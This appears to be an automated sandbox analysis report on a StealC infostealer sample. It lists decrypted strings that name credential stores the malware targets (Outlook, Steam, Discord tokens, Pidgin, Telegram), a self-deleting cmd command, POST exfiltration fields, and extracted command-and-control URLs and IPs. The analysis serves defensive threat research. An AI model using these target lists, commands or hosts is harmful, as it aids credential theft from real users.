                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: D877F783D5D3EF8C*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: map*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: A7FDF864FBC10B77*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: A92DAA6EA6F891F2*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: F8806DD0C461824F*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Telegram
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Tox
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: *.tox
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: *.ini
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Password
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 00000001
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 00000002
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 00000003
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 00000004
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Outlook\accounts.txt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Pidgin
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \.purple\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: accounts.xml
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: dQw4w9WgXcQ
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: token:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Software\Valve\Steam
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SteamPath
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \config\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ssfn*
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: config.vdf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DialogConfig.vdf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: libraryfolders.vdf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: loginusers.vdf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Steam\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: browsers
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: done
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: soft
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Discord\tokens.txt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: https
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: POST
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HTTP/1.1
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Content-Disposition: form-data; name="
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: hwid
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: build
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: token
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: file_name
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: file
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: message
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: screenshot.jpg
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00779B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,17_2_00779B60
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,17_2_0077C820
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00777240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,17_2_00777240
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00779AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,17_2_00779AC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00788EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,17_2_00788EA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8DA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,17_2_6C8DA9A0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D44C0 PK11_PubEncrypt,17_2_6C8D44C0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8A4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,17_2_6C8A4420
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D4440 PK11_PrivDecrypt,17_2_6C8D4440
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9225B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,17_2_6C9225B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8BE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,17_2_6C8BE6E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8DA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,17_2_6C8DA650
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B8670 PK11_ExportEncryptedPrivKeyInfo,17_2_6C8B8670
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,17_2_6C8FA730
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C900180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,17_2_6C900180
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D43B0 PK11_PubEncryptPKCS1,PR_SetError,17_2_6C8D43B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,17_2_6C8F7C00
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,17_2_6C8FBD30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,17_2_6C8B7D60
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,17_2_6C8F9EC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D3FF0 PK11_PrivDecryptPKCS1,17_2_6C8D3FF0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,17_2_6C8D9840
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,17_2_6C8D3850
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FDA40 SEC_PKCS7ContentIsEncrypted,17_2_6C8FDA40
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_97afe801-3
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
                          Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0077E430
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00784910
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0077BE70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_007716D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0077F6B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,17_2_00783EA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0077DA80
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_007838B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,17_2_00784570
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,17_2_0077ED20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0077DE10
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                          Networking

                          barindex
                          Source: Malware configuration extractorURLs: http://185.215.113.17/2fb6c2cc8dce150a.php
                          Source: Malware configuration extractorURLs: computeryrati.site
                          Source: Malware configuration extractorURLs: faulteyotk.site
                          Source: Malware configuration extractorURLs: contemteny.site
                          Source: Malware configuration extractorURLs: authorisev.site
                          Source: Malware configuration extractorURLs: servicedny.site
                          Source: Malware configuration extractorURLs: goalyfeastz.site
                          Source: Malware configuration extractorURLs: opposezmny.site
                          Source: Malware configuration extractorURLs: seallysl.site
                          Source: Malware configuration extractorURLs: dilemmadu.site
                          Source: Malware configuration extractorURLs: http://185.215.113.17/2fb6c2cc8dce150a.php
                          Source: Malware configuration extractorIPs: 185.215.113.16
                          Source: Malware configuration extractorURLs: sevjoi17sr.top
                          Source: Malware configuration extractorURLs: home.sevjoi17sr.top
                          Source: Malware configuration extractorURLs: 0/80/home.sevjoi17sr.top
                          Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                          Source: Joe Sandbox ViewIP Address: 20.101.57.9 20.101.57.9
                          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007760A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,17_2_007760A0
                          Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.c equals www.youtube.com (Youtube)
                          Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: captcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https equals www.youtube.com (Youtube)
                          Source: chrome.exe, 0000002B.00000003.2369946167.00002B3C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2369741225.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2370978019.00002B3C00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                          Source: chrome.exe, 0000002B.00000003.2369946167.00002B3C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2369741225.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2370978019.00002B3C00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                          Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                          Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                          Source: chrome.exe, 0000002B.00000002.2759328311.00002B3C002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
                          Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
